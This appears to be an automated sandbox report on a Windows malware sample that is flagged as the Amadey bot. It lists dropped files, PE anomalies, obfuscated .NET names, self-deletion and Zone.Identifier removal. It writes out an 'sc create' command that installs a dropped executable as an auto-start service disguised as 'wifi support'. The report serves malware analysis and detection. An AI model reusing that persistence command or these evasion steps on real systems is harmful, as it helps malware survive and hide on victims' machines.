Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })

Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00404CE9 push ecx; ret	0_2_00404CFC
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_004038B3 push ecx; ret	0_2_004038C6
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00412EA4 push eax; ret	0_2_00412EC2
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00523C66 push esi; ret	0_2_00523C7C
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00523C01 push esi; ret	0_2_00523C7C
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 0_2_00533634 push es; iretd	0_2_00533640
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00401880 push esi; iretd	1_2_00401893
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_2_00402E94 push es; iretd	1_2_00402EA0
Source: C:\Users\user\Desktop\U3E7zMaux2.exe	Code function: 1_1_00402E94 push es; iretd	1_1_00402EA0
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00401880 push esi; iretd	12_2_00401893
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_2_00402E94 push es; iretd	12_2_00402EA0
Source: C:\Users\user\AppData\Roaming\uufaeea	Code function: 12_1_00402E94 push es; iretd	12_1_00402EA0
Source: C:\Users\user\AppData\Local\Temp\D984.exe	Code function: 14_2_00412CA4 push eax; ret	14_2_00412CC2
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 17_2_00523C66 push esi; ret	17_2_00523C7C
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 17_2_00523C01 push esi; ret	17_2_00523C7C
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00401880 push esi; iretd	19_2_00401893
Source: C:\Users\user\AppData\Local\Temp\E666.exe	Code function: 19_2_00402E94 push es; iretd	19_2_00402EA0
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_004139B0 push eax; ret	20_2_004139DE
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00465C53 push ss; retf	20_2_00465C66
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00463EE0 pushad ; ret	20_2_00463EE1
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_0046128B push ebx; ret	20_2_0046128C
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00464941 pushfd ; ret	20_2_00464A9F
Source: C:\Users\user\AppData\Local\Temp\7CA1.exe	Code function: 20_2_00464973 pushfd ; ret	20_2_00464A9F
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_00FA8508 push 00000028h; retf 0000h	22_2_00FA850D
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_00FA764A push esp; ret	22_2_00FA764B
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_03194003 push esi; retf	22_2_0319400F
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_032CA7DD push ebp; retf	22_2_032CA7DF
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_032C0D8C push E86CED43h; retf	22_2_032C0D91
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Code function: 22_2_05992503 push E80A995Eh; ret	22_2_05992509
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_00463A79 push 0000002Bh; iretd	36_2_00463A7F
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Code function: 36_2_00461283 push ds; ret	36_2_00461284

Source: C:\Users\user\Desktop\U3E7zMaux2.exe

Code function: 0_2_0040A3DE LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

0_2_0040A3DE

Source: 8EC4.exe.7.dr

Static PE information: 0xA22A793F [Sun Mar 19 11:55:43 2056 UTC]

Source: 8ED5.exe.7.dr	Static PE information: section name: .gizi
Source: 8ED5.exe.7.dr	Static PE information: section name: .bur
Source: 8ED5.exe.7.dr	Static PE information: section name: .wob
Source: 9A02.exe.7.dr	Static PE information: section name: .code
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name:
Source: ACEF.exe.7.dr	Static PE information: section name: .T3QbYgM
Source: ACEF.exe.7.dr	Static PE information: section name: .adata
Source: BEB3.exe.7.dr	Static PE information: section name: .didata
Source: CC60.exe.7.dr	Static PE information: section name: .code

Source: initial sample

Static PE information: section where entry point is pointing to: .didata

Source: CC60.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x60613
Source: ACEF.exe.7.dr	Static PE information: real checksum: 0x361362 should be: 0x3775f1
Source: 8EC4.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x9011f
Source: 9A02.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x5e577

Source: initial sample	Static PE information: section name: .text entropy: 7.2566886804
Source: initial sample	Static PE information: section name: entropy: 7.9969707961
Source: initial sample	Static PE information: section name: entropy: 7.91194455639
Source: initial sample	Static PE information: section name: .rsrc entropy: 7.22501727341
Source: initial sample	Static PE information: section name: .T3QbYgM entropy: 7.91938761659
Source: initial sample	Static PE information: section name: .didata entropy: 7.99713235918

Source: 8EC4.exe.7.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 8EC4.exe.7.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.2.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.2.8EC4.exe.fa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 22.0.8EC4.exe.fa0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 22.0.8EC4.exe.fa0000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.0.8EC4.exe.610000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.0.8EC4.exe.610000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.0.8EC4.exe.610000.9.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.0.8EC4.exe.610000.9.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.2.8EC4.exe.610000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.2.8EC4.exe.610000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
Source: 40.0.8EC4.exe.610000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
Source: 40.0.8EC4.exe.610000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.cs	High entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

Persistence and Installation Behavior:

Yara detected Amadey bot

Show sources

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000030.00000002.940319035.00000000007A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.942563144.00000000007CC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.943525106.00000000007D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000030.00000002.934963218.0000000000751000.00000004.00000001.sdmp, type: MEMORY

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: unknown

Executable created and started: C:\Windows\SysWOW64\shayesoq\lagavljy.exe

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\uufaeea

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7801.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\86C4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\qipcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	File created: C:\Users\user\AppData\Local\Temp\lagavljy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\ACEF.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\7CA1.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8ED5.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\BEB3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9A02.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\softokn3.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\CC60.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\D984.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E666.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\prldap60.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\B58B.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\libEGL.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\8EC4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\lgpllibs.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\uufaeea	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7801.exe	File created: C:\Users\user\AppData\LocalLow\sG8rM8v\ucrtbase.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\SysWOW64\shayesoq\lagavljy.exe (copy)

Jump to dropped file

Source: C:\Windows\SysWOW64\svchost.exe

Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\shayesoq

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create shayesoq binPath= "C:\Windows\SysWOW64\shayesoq\lagavljy.exe /d\"C:\Users\user\AppData\Local\Temp\86C4.exe\"" type= own start= auto DisplayName= "wifi support

Source: C:\Users\user\AppData\Local\Temp\86C4.exe

21_2_00409A6B

Hooking and other Techniques for Hiding and Protection:

Deletes itself after installation

Show sources

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\u3e7zmaux2.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\uufaeea:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\7CA1.exe

Code function: 20_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,

20_2_0040C2E0

Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\86C4.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\shayesoq\lagavljy.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\8EC4.exe	Process information set: NOOPENFILEERRORBOX
